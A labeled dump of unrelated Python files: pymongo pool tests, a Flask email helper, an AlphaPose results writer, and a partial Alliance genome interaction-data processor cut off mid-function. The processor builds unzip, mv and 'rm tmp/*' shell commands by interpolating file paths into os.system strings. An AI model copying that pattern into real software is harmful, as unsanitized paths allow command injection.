def test_max_pool_size_none(self):
self._test_max_pool_size(
start_request=0, end_request=0, nthreads=10, max_pool_size=None)
def test_max_pool_size_with_request(self):
self._test_max_pool_size(
start_request=1, end_request=1, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_multiple_request(self):
self._test_max_pool_size(
start_request=10, end_request=10, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_redundant_request(self):
self._test_max_pool_size(
start_request=2, end_request=1, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_redundant_request2(self):
self._test_max_pool_size(
start_request=20, end_request=1, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_redundant_request_no_rendezvous(self):
self._test_max_pool_size_no_rendezvous(2, 1)
def test_max_pool_size_with_redundant_request_no_rendezvous2(self):
self._test_max_pool_size_no_rendezvous(20, 1)
def test_max_pool_size_with_leaked_request(self):
# Call start_request() but not end_request() -- when threads die, they
# should return their request sockets to the pool.
self._test_max_pool_size(
start_request=1, end_request=0, nthreads=10, max_pool_size=10)
def test_max_pool_size_with_leaked_request_no_rendezvous(self):
self._test_max_pool_size_no_rendezvous(1, 0)
def test_max_pool_size_with_end_request_only(self):
# Call end_request() but not start_request()
self._test_max_pool_size(0, 1)
def test_max_pool_size_with_connection_failure(self):
# The pool acquires its semaphore before attempting to connect; ensure
# it releases the semaphore on connection failure.
class TestPool(Pool):
def connect(self, pair):
raise socket.error()
test_pool = TestPool(
pair=('example.com', 27017),
max_size=1,
net_timeout=1,
conn_timeout=1,
use_ssl=False,
wait_queue_timeout=1,
use_greenlets=self.use_greenlets)
# First call to get_socket fails; if pool doesn't release its semaphore
# then the second call raises "ConnectionFailure: Timed out waiting for
# socket from pool" instead of the socket.error.
for i in range(2):
self.assertRaises(socket.error, test_pool.get_socket)
class SocketGetter(MongoThread):
"""Utility for _TestMaxOpenSockets and _TestWaitQueueMultiple"""
def __init__(self, test_case, pool):
super(SocketGetter, self).__init__(test_case)
self.state = 'init'
self.pool = pool
self.sock = None
def run(self):
self.state = 'get_socket'
self.sock = self.pool.get_socket()
self.state = 'sock'
class _TestMaxOpenSockets(_TestPoolingBase):
"""Test that connection pool doesn't open more than max_size sockets.
To be run both with threads and with greenlets.
"""
def get_pool_with_wait_queue_timeout(self, wait_queue_timeout):
return self.get_pool((host, port),
1, None, None,
False,
wait_queue_timeout=wait_queue_timeout,
wait_queue_multiple=None)
def test_wait_queue_timeout(self):
wait_queue_timeout = 2 # Seconds
pool = self.get_pool_with_wait_queue_timeout(wait_queue_timeout)
sock_info = pool.get_socket()
start = time.time()
self.assertRaises(ConnectionFailure, pool.get_socket)
duration = time.time() - start
self.assertTrue(
abs(wait_queue_timeout - duration) < 1,
"Waited %.2f seconds for a socket, expected %f" % (
duration, wait_queue_timeout))
sock_info.close()
def test_blocking(self):
# Verify get_socket() with no wait_queue_timeout blocks forever.
pool = self.get_pool_with_wait_queue_timeout(None)
# Reach max_size.
s1 = pool.get_socket()
t = SocketGetter(self, pool)
t.start()
while t.state != 'get_socket':
self.sleep(0.1)
self.sleep(1)
self.assertEqual(t.state, 'get_socket')
pool.maybe_return_socket(s1)
while t.state != 'sock':
self.sleep(0.1)
self.assertEqual(t.state, 'sock')
self.assertEqual(t.sock, s1)
s1.close()
class _TestWaitQueueMultiple(_TestPoolingBase):
"""Test that connection pool doesn't allow more than
waitQueueMultiple * max_size waiters.
To be run both with threads and with greenlets.
"""
def get_pool_with_wait_queue_multiple(self, wait_queue_multiple):
return self.get_pool((host, port),
2, None, None,
False,
wait_queue_timeout=None,
wait_queue_multiple=wait_queue_multiple)
def test_wait_queue_multiple(self):
pool = self.get_pool_with_wait_queue_multiple(3)
# Reach max_size sockets.
socket_info_0 = pool.get_socket()
socket_info_1 = pool.get_socket()
# Reach max_size * wait_queue_multiple waiters.
threads = []
for _ in xrange(6):
t = SocketGetter(self, pool)
t.start()
threads.append(t)
self.sleep(1)
for t in threads:
self.assertEqual(t.state, 'get_socket')
self.assertRaises(ExceededMaxWaiters, pool.get_socket)
socket_info_0.close()
socket_info_1.close()
def test_wait_queue_multiple_unset(self):
pool = self.get_pool_with_wait_queue_multiple(None)
socks = []
for _ in xrange(2):
sock = pool.get_socket()
socks.append(sock)
threads = []
for _ in xrange(30):
t = SocketGetter(self, pool)
t.start()
threads.append(t)
self.sleep(1)
for t in threads:
self.assertEqual(t.state, 'get_socket')
for socket_info in socks:
socket_info.close()
class _TestPoolSocketSharing(_TestPoolingBase):
"""Directly test that two simultaneous operations don't share a socket. To
be run both with threads and with greenlets.
"""
def _test_pool(self, use_request):
"""
Test that the connection pool prevents both threads and greenlets from
using a socket at the same time.
Sequence:
gr0: start a slow find()
gr1: start a fast find()
gr1: get results
gr0: get results
"""
cx = get_client(
use_greenlets=self.use_greenlets,
auto_start_request=False
)
db = cx.pymongo_test
db.test.remove()
db.test.insert({'_id': 1})
history = []
def find_fast():
if use_request:
cx.start_request()
history.append('find_fast start')
# With greenlets and the old connection._Pool, this would throw
# AssertionError: "This event is already used by another
# greenlet"
self.assertEqual({'_id': 1}, db.test.find_one())
history.append('find_fast done')
if use_request:
cx.end_request()
def find_slow():
if use_request:
cx.start_request()
history.append('find_slow start')
# Javascript function that pauses N seconds per document
fn = delay(10)
if (is_mongos(db.connection) or not
version.at_least(db.connection, (1, 7, 2))):
# mongos doesn't support eval so we have to use $where
# which is less reliable in this context.
self.assertEqual(1, db.test.find({"$where": fn}).count())
else:
# 'nolock' allows find_fast to start and finish while we're
# waiting for this to complete.
self.assertEqual({'ok': 1.0, 'retval': True},
db.command('eval', fn, nolock=True))
history.append('find_slow done')
if use_request:
cx.end_request()
if self.use_greenlets:
gr0, gr1 = Greenlet(find_slow), Greenlet(find_fast)
gr0.start()
gr1.start_later(.1)
else:
gr0 = threading.Thread(target=find_slow)
gr0.setDaemon(True)
gr1 = threading.Thread(target=find_fast)
gr1.setDaemon(True)
gr0.start()
time.sleep(.1)
gr1.start()
gr0.join()
gr1.join()
self.assertEqual([
'find_slow start',
'find_fast start',
'find_fast done',
'find_slow done',
], history)
def test_pool(self):
self._test_pool(use_request=False)
def test_pool_request(self):
self._test_pool(use_request=True)
|
email.py
|
"""
Provides email-sending support for the app.
config.py must be set up first.
"""
from threading import Thread
from flask import current_app, render_template
from flask.ext.mail import Message
from . import mail
# We send emails asynchronously because sending them inline would leave the
# browser unresponsive for a while. To avoid this, the actual send call is
# moved to a background thread.
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
# Takes the destination address, a subject line and a template, and
# spawns a thread to send the email.
# The template must be given without an extension so that both plain-text
# and rich-text bodies can be rendered.
def send_email(to, subject, template, **kwargs):
app = current_app._get_current_object()
msg = Message(app.config['ANTISOCIAL_MAIL_SUBJECT_PREFIX'] + ' ' + subject,
sender=app.config['ANTISOCIAL_MAIL_SENDER'], recipients=[to])
msg.body = render_template(template + '.txt', **kwargs)
msg.html = render_template(template + '.html', **kwargs)
thr = Thread(target=send_async_email, args=[app, msg])
thr.start()
return thr
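# A minimal usage sketch (the recipient and template name below are hypothetical; it must run
# inside an application/request context so current_app and render_template work):
#   send_email('user@example.com', 'Welcome', 'mail/welcome', user=user)
# This expects templates 'mail/welcome.txt' and 'mail/welcome.html' to exist and returns the
# started Thread, so callers (e.g. tests) can join() it.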
|
writer.py
|
import os
import time
from threading import Thread
from queue import Queue
import cv2
import numpy as np
import torch
import torch.multiprocessing as mp
from alphapose.utils.transforms import get_func_heatmap_to_coord
from alphapose.utils.pPose_nms import pose_nms
DEFAULT_VIDEO_SAVE_OPT = {
'savepath': 'examples/res/1.mp4',
'fourcc': cv2.VideoWriter_fourcc(*'mp4v'),
'fps': 25,
'frameSize': (640, 480)
}
class DataWriter():
def __init__(self, cfg, opt, save_video=False,
video_save_opt=DEFAULT_VIDEO_SAVE_OPT,
queueSize=1024):
self.cfg = cfg
self.opt = opt
self.video_save_opt = video_save_opt
self.eval_joints = list(range(cfg.DATA_PRESET.NUM_JOINTS))
self.save_video = save_video
self.final_result = []
self.heatmap_to_coord = get_func_heatmap_to_coord(cfg)
        # initialize the queues used to pass per-frame pose results
        # between the main process and the result-writing worker
if opt.sp:
self.result_queue = Queue(maxsize=queueSize)
self.final_result_queue = Queue(maxsize=queueSize)
else:
self.result_queue = mp.Queue(maxsize=queueSize)
self.final_result_queue = mp.Queue(maxsize=queueSize)
if opt.save_img:
if not os.path.exists(opt.outputpath + '/vis'):
os.mkdir(opt.outputpath + '/vis')
if opt.pose_track:
from PoseFlow.poseflow_infer import PoseFlowWrapper
self.pose_flow_wrapper = PoseFlowWrapper(save_path=os.path.join(opt.outputpath, 'poseflow'))
def start_worker(self, target):
if self.opt.sp:
p = Thread(target=target, args=())
else:
p = mp.Process(target=target, args=())
# p.daemon = True
p.start()
return p
def start(self):
# start a thread to read pose estimation results per frame
self.result_worker = self.start_worker(self.update)
return self
def update(self):
if self.save_video:
            # initialize the file video stream, adapting the output video resolution to the original video
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
if not stream.isOpened():
print("Try to use other video encoders...")
ext = self.video_save_opt['savepath'].split('.')[-1]
fourcc, _ext = self.recognize_video_ext(ext)
self.video_save_opt['fourcc'] = fourcc
self.video_save_opt['savepath'] = self.video_save_opt['savepath'][:-4] + _ext
stream = cv2.VideoWriter(*[self.video_save_opt[k] for k in ['savepath', 'fourcc', 'fps', 'frameSize']])
assert stream.isOpened(), 'Cannot open video for writing'
        # keep looping infinitely
while True:
# ensure the queue is not empty and get item
(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name) = self.wait_and_get(self.result_queue)
if orig_img is None:
# if the thread indicator variable is set (img is None), stop the thread
self.wait_and_put(self.final_result_queue, None)
if self.save_video:
stream.release()
return
# image channel RGB->BGR
orig_img = np.array(orig_img, dtype=np.uint8)[:, :, ::-1]
if boxes is None:
if self.opt.save_img or self.save_video or self.opt.vis:
self.write_image(orig_img, im_name, stream=stream if self.save_video else None)
else:
# location prediction (n, kp, 2) | score prediction (n, kp, 1)
pred = hm_data.cpu().data.numpy()
assert pred.ndim == 4
if hm_data.size()[1] == 49:
self.eval_joints = [*range(0,49)]
pose_coords = []
pose_scores = []
for i in range(hm_data.shape[0]):
bbox = cropped_boxes[i].tolist()
pose_coord, pose_score = self.heatmap_to_coord(pred[i][self.eval_joints], bbox)
pose_coords.append(torch.from_numpy(pose_coord).unsqueeze(0))
pose_scores.append(torch.from_numpy(pose_score).unsqueeze(0))
preds_img = torch.cat(pose_coords)
preds_scores = torch.cat(pose_scores)
result = pose_nms(boxes, scores, ids, preds_img, preds_scores, self.opt.min_box_area)
result = {
'imgname': im_name,
'result': result
}
if self.opt.pose_track:
poseflow_result = self.pose_flow_wrapper.step(orig_img, result)
for i in range(len(poseflow_result)):
result['result'][i]['idx'] = poseflow_result[i]['idx']
self.wait_and_put(self.final_result_queue, result)
if self.opt.save_img or self.save_video or self.opt.vis:
if hm_data.size()[1] == 49:
from alphapose.utils.vis import vis_frame_dense as vis_frame
elif self.opt.vis_fast:
from alphapose.utils.vis import vis_frame_fast as vis_frame
else:
from alphapose.utils.vis import vis_frame
img = vis_frame(orig_img, result, add_bbox=(self.opt.pose_track | self.opt.tracking))
self.write_image(img, im_name, stream=stream if self.save_video else None)
def write_image(self, img, im_name, stream=None):
if self.opt.vis:
cv2.imshow("AlphaPose Demo", img)
cv2.waitKey(30)
if self.opt.save_img:
cv2.imwrite(os.path.join(self.opt.outputpath, 'vis', im_name), img)
if self.save_video:
stream.write(img)
def wait_and_put(self, queue, item):
queue.put(item)
def wait_and_get(self, queue):
return queue.get()
def save(self, boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name):
self.commit()
# save next frame in the queue
self.wait_and_put(self.result_queue, (boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name))
def running(self):
# indicate that the thread is still running
time.sleep(0.2)
self.commit()
return not self.result_queue.empty()
def count(self):
# indicate the remaining images
return self.result_queue.qsize()
def stop(self):
# indicate that the thread should be stopped
self.save(None, None, None, None, None, None, None)
while True:
final_res = self.wait_and_get(self.final_result_queue)
if final_res:
self.final_result.append(final_res)
else:
break
self.result_worker.join()
def clear_queues(self):
self.clear(self.result_queue)
self.clear(self.final_result_queue)
def clear(self, queue):
while not queue.empty():
queue.get()
def commit(self):
# commit finished final results to main process
while not self.final_result_queue.empty():
self.final_result.append(self.wait_and_get(self.final_result_queue))
def results(self):
# return final result
return self.final_result
def recognize_video_ext(self, ext=''):
if ext == 'mp4':
return cv2.VideoWriter_fourcc(*'mp4v'), '.' + ext
elif ext == 'avi':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
elif ext == 'mov':
return cv2.VideoWriter_fourcc(*'XVID'), '.' + ext
else:
print("Unknow video format {}, will use .mp4 instead of it".format(ext))
return cv2.VideoWriter_fourcc(*'mp4v'), '.mp4'
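# A minimal usage sketch (assuming `cfg` and `opt` are AlphaPose config/option objects exposing
# the attributes referenced above, e.g. opt.sp, opt.save_img, opt.vis, opt.outputpath):
#   writer = DataWriter(cfg, opt, save_video=False).start()
#   writer.save(boxes, scores, ids, hm_data, cropped_boxes, orig_img, im_name)  # once per frame
#   writer.stop()                  # flushes remaining results and joins the worker
#   results = writer.results()     # list of {'imgname': ..., 'result': ...} entries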
|
interaction_molecular_processor.py
|
import logging
import multiprocessing
import csv
import re
import json
import os
import sys
import urllib.request
from tqdm import tqdm
from datetime import datetime
from string import Template
from processor import Processor
logger = logging.getLogger(__name__)
class HeaderTemplate(Template):
delimiter = '%'
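# string.Template subclass whose placeholders are introduced by '%' instead of the default '$',
# e.g. (hypothetical) HeaderTemplate('# Generated %date').substitute(date='2021-01-01').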
class InteractionMolecularProcessor(Processor):
def __init__(self, configs):
super().__init__()
self.data_type_configs = configs
self.master_gene_set = set()
self.master_crossreference_dictionary = dict()
self.master_crossreference_dictionary['UniProtKB'] = dict()
self.master_crossreference_dictionary['ENSEMBL'] = dict()
self.master_crossreference_dictionary['NCBI_Gene'] = dict()
self.master_crossreference_dictionary['RefSeq'] = dict()
self.biogrid_rna_set = set()
self.biogrid_genetic_set = set()
self.biogrid_doi_dict = dict()
self.coronavirus_injection_dict = dict()
self.output_dir = '/usr/src/app/output/'
self.download_dir = '/usr/src/app/download_molecular/'
def _load_and_process_data(self):
logger.info("in InteractionMolecularProcessor")
source_filepaths = dict()
interaction_source_config = self.data_type_configs[0]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
source_filepaths[sub_type_name] = sub_type_filepath
for sub_type in source_filepaths:
logger.debug("Source subtype %s filepath %s" % (sub_type, source_filepaths[sub_type]))
bgi_filepaths = dict()
interaction_source_config = self.data_type_configs[1]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
bgi_filepaths[sub_type_name] = sub_type_filepath
for sub_type in bgi_filepaths:
logger.debug("BGI subtype %s filepath %s" % (sub_type, bgi_filepaths[sub_type]))
interactions_molecular = InteractionMolecularProcessor(self.data_type_configs)
interactions_molecular.parse_bgi_json()
interactions_molecular.get_data()
interactions_molecular.validate_and_upload_files_to_fms()
def parse_bgi_json(self):
# We're populating a rather large dictionary to use for looking up Alliance genes by their crossreferences.
# Edit the list below if you'd like to add more crossreferences to the dictionary.
        # The key of the dictionary is the crossreference and the value is the list of Alliance genes to which it resolves.
#
# We're also populating the "master gene set" for gene lookups later.
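        # For illustration (identifiers are hypothetical), the populated structures look like:
        #   master_crossreference_dictionary['UniProtKB']['uniprotkb:p12345'] -> ['WB:WBGene00000001']
        #   master_gene_set -> {'WB:WBGene00000001', 'FB:FBgn0000001', ...}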
logger.info('Populating master gene set and crossreferences from JSON.')
bgi_filepaths = dict()
interaction_source_config = self.data_type_configs[1]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
bgi_filepaths[sub_type_name] = sub_type_filepath
for sub_type in bgi_filepaths:
logger.info("BGI subtype %s filepath %s" % (sub_type, bgi_filepaths[sub_type]))
filepath = bgi_filepaths[sub_type]
with open(filepath) as json_file:
data = json.load(json_file)
logger.info('Scanning {}'.format(filepath))
# for local runs, to see progress
# for item in tqdm(data['data']):
for item in data['data']:
gene_identifier = item['basicGeneticEntity']['primaryId']
self.master_gene_set.add(gene_identifier)
for xref in item['basicGeneticEntity']['crossReferences']:
cross_ref_record = None
cross_ref_prefix = None
if xref['id'].startswith('NCBI_Gene'):
# Modify the cross reference ID to match the PSI MITAB format if necessary.
# So far, this is just converting 'NCBI_Gene' to 'entrez gene/locuslink'.
cross_ref_prefix = 'NCBI_Gene'
cross_ref_record_split = xref['id'].split(':')[1]
cross_ref_record = 'entrez gene/locuslink:' + cross_ref_record_split
elif xref['id'].startswith('UniProtKB'):
cross_ref_prefix = 'UniProtKB'
cross_ref_record = xref['id']
elif xref['id'].startswith('ENSEMBL'):
cross_ref_prefix = 'ENSEMBL'
cross_ref_record = xref['id']
elif xref['id'].startswith('RefSeq'):
cross_ref_prefix = 'RefSeq'
cross_ref_record = xref['id']
# The crossreference dictionary is a list of genes linked to a single crossreference.
# Append the gene if the crossref dict entry exists.
# Otherwise, create a list and append the entry.
if cross_ref_record is not None:
if cross_ref_record.lower() in self.master_crossreference_dictionary[cross_ref_prefix]:
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()]\
.append(gene_identifier)
else:
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()] = []
self.master_crossreference_dictionary[cross_ref_prefix][cross_ref_record.lower()].append(
gene_identifier)
# hardcoded exception that does not have a resolvable crossReference identifier in BGI
self.master_crossreference_dictionary['NCBI_Gene']['entrez gene/locuslink:ORF9c'.lower()] = ['RefSeq:P0DTD3']
# The ids in PSI-MITAB files are lower case, hence the .lower() used above.
logger.info('Done.')
def resolve_identifiers_by_row(self, row, mapped_out):
interactor_A_rows = [0, 2, 4, 22]
interactor_B_rows = [1, 3, 5, 23]
interactor_A_resolved = False
interactor_B_resolved = False
taxon1 = re.search(r'taxid:\d+', row[9]).group(0)
taxon2 = re.search(r'taxid:\d+', row[10]).group(0)
interactor_A_list = []
for row_entry in interactor_A_rows:
if '|' in row[row_entry]:
interactors_A = row[row_entry].split('|')
for interactor_A in interactors_A:
interactor_A = interactor_A.replace("uniprot/swiss-prot:", "uniprotkb:")
interactor_A_list.append(interactor_A)
else:
interactor_A_list.append(row[row_entry])
interactor_B_list = []
for row_entry in interactor_B_rows:
if '|' in row[row_entry]:
interactors_B = row[row_entry].split('|')
for interactor_B in interactors_B:
interactor_B = interactor_B.replace("uniprot/swiss-prot:", "uniprotkb:")
interactor_B_list.append(interactor_B)
else:
interactor_B_list.append(row[row_entry])
interactor_A_resolved, A_resolved_id = self.resolve_identifier(interactor_A_list, taxon1)
interactor_B_resolved, B_resolved_id = self.resolve_identifier(interactor_B_list, taxon2)
if A_resolved_id is not None and B_resolved_id is not None:
mapped_output_rows = [row[13], A_resolved_id, B_resolved_id]
mapped_out.writerow(mapped_output_rows)
if taxon1 == 'taxid:2697049': # for sars-cov-2 first match on refseq
if A_resolved_id in self.coronavirus_injection_dict:
row[0] = self.coronavirus_injection_dict[A_resolved_id][0]
row[2] = self.coronavirus_injection_dict[A_resolved_id][1]
row[4] = self.coronavirus_injection_dict[A_resolved_id][2]
if taxon2 == 'taxid:2697049': # for sars-cov-2 first match on refseq
if B_resolved_id in self.coronavirus_injection_dict:
row[1] = self.coronavirus_injection_dict[B_resolved_id][0]
row[3] = self.coronavirus_injection_dict[B_resolved_id][1]
row[5] = self.coronavirus_injection_dict[B_resolved_id][2]
return interactor_A_resolved, interactor_B_resolved, row
def resolve_identifier(self, interactor_list, taxon):
# The order of this list is important.
list_of_crossref_regex_to_search = [
'uniprotkb:[\\w\\d_-]*$',
'ensembl:[\\w\\d_-]*$',
'entrez gene/locuslink:.*$'
]
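        # e.g. 'uniprotkb:P12345' matches the first pattern and 'entrez gene/locuslink:12345'
        # matches the last (both identifiers here are hypothetical).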
if taxon == 'taxid:2697049': # for sars-cov-2, first match on refseq
list_of_crossref_regex_to_search.insert(0, 'refseq:[\\w\\d_-]*$')
# Prioritize matching based on regex priority instead of column order
for regex_entry in list_of_crossref_regex_to_search:
for individual_entry in interactor_list:
# For use in wormbase / flybase lookups.
                # If we run into an IndexError, there's no identifier to resolve in this entry, so we skip it.
try:
entry_stripped = individual_entry.split(':')[1]
except IndexError:
continue
# uniprotkb: could have trailing '-<something>' that should be stripped
if individual_entry.startswith('uniprotkb:'):
if taxon != 'taxid:2697049': # if not sars-cov-2 strip hyphen and after
individual_entry = individual_entry.split('-')[0]
prefixed_identifier = None
logger.debug('resolving individual_entry : %s ; taxon : %s' % (individual_entry, taxon))
if entry_stripped.startswith('WB'):
prefixed_identifier = 'WB:' + entry_stripped
if prefixed_identifier in self.master_gene_set:
return True, prefixed_identifier
else:
logger.debug('resolved WB False : ' + prefixed_identifier)
return False, None
elif entry_stripped.startswith('FB'):
prefixed_identifier = 'FB:' + entry_stripped
if prefixed_identifier in self.master_gene_set:
logger.debug('resolved FB False : ' + prefixed_identifier)
return True, prefixed_identifier
else:
return False, None
regex_output = re.findall(regex_entry, individual_entry)
if regex_output is not None:
for regex_match in regex_output: # We might have multiple regex matches. Search them all against our crossreferences.
identifier = regex_match
for crossreference_type in self.master_crossreference_dictionary.keys():
# Using lowercase in the identifier to be consistent with Alliance lowercase identifiers.
if identifier.lower() in self.master_crossreference_dictionary[crossreference_type]:
if taxon == 'taxid:2697049': # for sars-cov-2 get the first primaryId value that matches the identifier in the BGI
return True, self.master_crossreference_dictionary[crossreference_type][identifier.lower()][0].lower() # Return 'True' if we find an entry.
else: # for other taxons return the identifier that matches in the BGI
return True, identifier.lower() # Return 'True' if we find an entry.
# If we can't resolve any of the crossReferences, return None
interactor_list_string = "\t".join(interactor_list)
logger.debug('resolved default False : ' + interactor_list_string)
return False, None
def unzip_to_filename(self, filename_zip, filename, datasubtype):
logger.info('Extracting file {} with unzip into {}'.format(filename_zip, filename))
os.system('unzip -o {} -d {}tmp/'.format(filename_zip, self.download_dir))
logger.info('Renaming extracted file.')
if datasubtype == 'IMEX': # Special exception for IMEX because it's 2 files.
os.system('mv {}tmp/intact.txt {}'.format(self.download_dir, filename))
os.system('rm {}tmp/*'.format(self.download_dir))
else:
os.system('mv {}tmp/* {}'.format(self.download_dir, filename))
def read_coronavirus_injection(self, coronavirus_injection_filename):
with open(coronavirus_injection_filename, 'r', encoding='utf-8') as coronavirus_injection_in:
csv_reader = csv.reader(coronavirus_injection_in, delimiter='\t', quoting=csv.QUOTE_NONE)
next(csv_reader, None) # Skip the headers
# for local runs, to see progress
# for row in tqdm(csv_reader):
for row in csv_reader:
if row[0].lower().startswith("refseq"):
logger.debug('Mapping coronavirus_injection_dict %s' % (row[0].lower()))
self.coronavirus_injection_dict[row[0].lower()] = [ row[0], row[1], row[2] ]
def create_biogrid_mappings(self, tab30_filename):
genetic_col12 = (
'Dosage Growth Defect',
'Dosage Lethality',
'Dosage Rescue',
'Negative Genetic',
'Phenotypic Enhancement',
'Phenotypic Suppression',
'Positive Genetic',
'Synthetic Growth Defect',
'Synthetic Haploinsufficiency',
'Synthetic Lethality',
'Synthetic Rescue')
with open(tab30_filename, 'r', encoding='utf-8') as tab30in:
csv_reader = csv.reader(tab30in, delimiter='\t', quoting=csv.QUOTE_NONE)
next(csv_reader, None) # Skip the headers
# for local runs, to see progress
# for row in tqdm(csv_reader):
for row in csv_reader:
if 'RNA' in row[11]:
self.biogrid_rna_set.add(row[0])
if row[12] == 'genetic' and row[11] in genetic_col12:
self.biogrid_genetic_set.add(row[0])
if row[12] == 'Experimental System Type' and row[11] == 'Experimental System':
self.biogrid_genetic_set.add(row[0])
if row[14].lower().startswith("doi"):
biogrid_key = 'biogrid:' + row[0]
self.biogrid_doi_dict[biogrid_key] = row[14].lower()
elif row[14].lower().startswith("pubmed"):
biogrid_key = 'biogrid:' + row[0]
self.biogrid_doi_dict[biogrid_key] = row[14].lower()
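# Illustrative sketch (hypothetical values): a BioGRID tab3 row with interaction id '123' and a
# publication source of 'PUBMED:7654321' is stored as
#   self.biogrid_doi_dict['biogrid:123'] = 'pubmed:7654321'
# and is later used in get_data() to replace placeholder 'pubmed:88880000' publications.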
def get_data(self):
rejected_col7 = (
# these are genetic interaction values and should not go into molecular output
'biogrid:BIOGRID_SYSTEM:0000010(Synthetic Lethality)',
'biogrid:BIOGRID_SYSTEM:0000011(Synthetic Growth Defect)',
'biogrid:BIOGRID_SYSTEM:0000012(Synthetic Rescue)',
'biogrid:BIOGRID_SYSTEM:0000013(Dosage Lethality)',
'biogrid:BIOGRID_SYSTEM:0000014(Dosage Growth Defect)',
'biogrid:BIOGRID_SYSTEM:0000015(Dosage Rescue)',
'biogrid:BIOGRID_SYSTEM:0000016(Phenotypic Enhancement)',
'biogrid:BIOGRID_SYSTEM:0000017(Phenotypic Suppression)',
'biogrid:BIOGRID_SYSTEM:0000028(Synthetic Haploinsufficiency)',
'biogrid:BIOGRID_SYSTEM:0000029(Negative Genetic)',
'biogrid:BIOGRID_SYSTEM:0000030(Positive Genetic)')
rejected_col12 = (
# these are genetic interaction values and should not go into molecular output
'psi-mi:"MI:2368"("phenotypic enhancement (sensu biogrid)")',
'psi-mi:"MI:2369"("synthetic growth defect (sensu biogrid)")',
'psi-mi:"MI:2370"("synthetic lethality (sensu biogrid)")',
'psi-mi:"MI:2371"("positive genetic interaction (sensu biogrid)")',
'psi-mi:"MI:2372"("synthetic haploinsufficiency (sensu biogrid)")',
'psi-mi:"MI:2373"("negative genetic interaction (sensu biogrid)")',
'psi-mi:"MI:2374"("phenotypic suppression (sensu biogrid)")',
'psi-mi:"MI:2375"("synthetic rescue (sensu biogrid)")',
'psi-mi:"MI:2376"("dosage rescue (sensu biogrid)")',
'psi-mi:"MI:2377"("dosage lethality (sensu biogrid)")',
'psi-mi:"MI:2378"("dosage growth defect (sensu biogrid)")')
source_filepaths = dict()
interaction_source_config = self.data_type_configs[0]
for sub_type in interaction_source_config.get_sub_type_objects():
sub_type_name = sub_type.get_sub_data_type()
sub_type_filepath = sub_type.get_filepath()
source_filepaths[sub_type_name] = sub_type_filepath
for sub_type in source_filepaths:
logger.info("Source subtype %s filepath %s" % (sub_type, source_filepaths[sub_type]))
wormbase_filename = source_filepaths['WB-MOL']
flybase_filename = source_filepaths['FB-MOL']
imex_filename_zip = source_filepaths['IMEX']
imex_filename = self.download_dir + 'INTERACTION-SOURCE_IMEX'
biogrid_filename_zip = source_filepaths['BIOGRID']
biogrid_filename = self.download_dir + 'INTERACTION-SOURCE_BIOGRID'
tab30_filename_zip = source_filepaths['BIOGRID-TAB']
tab30_filename = self.download_dir + 'INTERACTION-SOURCE_BIOGRID-TAB'
# comment this out on runs after the first one, to save time on unzipping large files
self.unzip_to_filename(imex_filename_zip, imex_filename, 'IMEX')
self.unzip_to_filename(biogrid_filename_zip, biogrid_filename, 'BIOGRID')
self.unzip_to_filename(tab30_filename_zip, tab30_filename, 'BIOGRID-TAB')
# To use smaller subset files
# imex_filename = self.output_dir + 'IMEx_SARS-CoV-2-human-only_interactions.mitab.txt'
# biogrid_filename = self.output_dir + 'BioGRID_SARS-CoV-2-human-only_interactions.mitab.txt'
self.create_biogrid_mappings(tab30_filename)
coronavirus_injection_filename = 'curation/coronavirus_injection.tsv'
self.read_coronavirus_injection(coronavirus_injection_filename)
# The order of this list is important.
parsing_list = [wormbase_filename, flybase_filename, biogrid_filename, imex_filename]
taxon_species_set = (
'taxid:10116',
'taxid:9606',
'taxid:10090',
'taxid:6239',
'taxid:559292',
'taxid:7955',
'taxid:7227',
'taxid:4932',
'taxid:307796',
'taxid:643680',
'taxid:574961',
'taxid:285006',
'taxid:545124',
'taxid:2697049',
'taxid:764097',
'-')
possible_yeast_taxon_set = ('taxid:4932', 'taxid:307796', 'taxid:643680', 'taxid:574961', 'taxid:285006', 'taxid:545124', 'taxid:764097')
interaction_exclusion_set = ('psi-mi:\"MI:0208\"', 'psi-mi:\"MI:0794\"', 'psi-mi:\"MI:0796\"', 'psi-mi:\"MI:0799\"')
interactor_type_exclusion_set = ('psi-mi:\"MI:0328\"', 'psi-mi:\"MI:1302\"', 'psi-mi:\"MI:1304\"', 'psi-mi:\"MI:0680\"')
# Load genes and uniprot csv files retrieved from the Alliance.
psi_mi_tab_header = [
'#ID(s) interactor A',
'ID(s) interactor B',
'Alt. ID(s) interactor A',
'Alt. ID(s) interactor B',
'Alias(es) interactor A',
'Alias(es) interactor B',
'Interaction detection method(s)',
'Publication 1st author(s)',
'Publication Identifier(s)',
'Taxid interactor A',
'Taxid interactor B',
'Interaction type(s)',
'Source database(s)',
'Interaction identifier(s)',
'Confidence value(s)',
'Expansion method(s)',
'Biological role(s) interactor A',
'Biological role(s) interactor B',
'Experimental role(s) interactor A',
'Experimental role(s) interactor B',
'Type(s) interactor A',
'Type(s) interactor B',
'Xref(s) interactor A',
'Xref(s) interactor B',
'Interaction Xref(s)',
'Annotation(s) interactor A',
'Annotation(s) interactor B',
'Interaction annotation(s)',
'Host organism(s)',
'Interaction parameter(s)',
'Creation date',
'Update date',
'Checksum(s) interactor A',
'Checksum(s) interactor B',
'Interaction Checksum(s)',
'Negative',
'Feature(s) interactor A',
'Feature(s) interactor B',
'Stoichiometry(s) interactor A',
'Stoichiometry(s) interactor B',
'Identification method participant A',
'Identification method participant B'
]
publication_tracking_dict = {}
# Open all of the output files.
with open(self.output_dir + 'alliance_molecular_interactions.tsv', 'w', encoding='utf-8') as tsvout, \
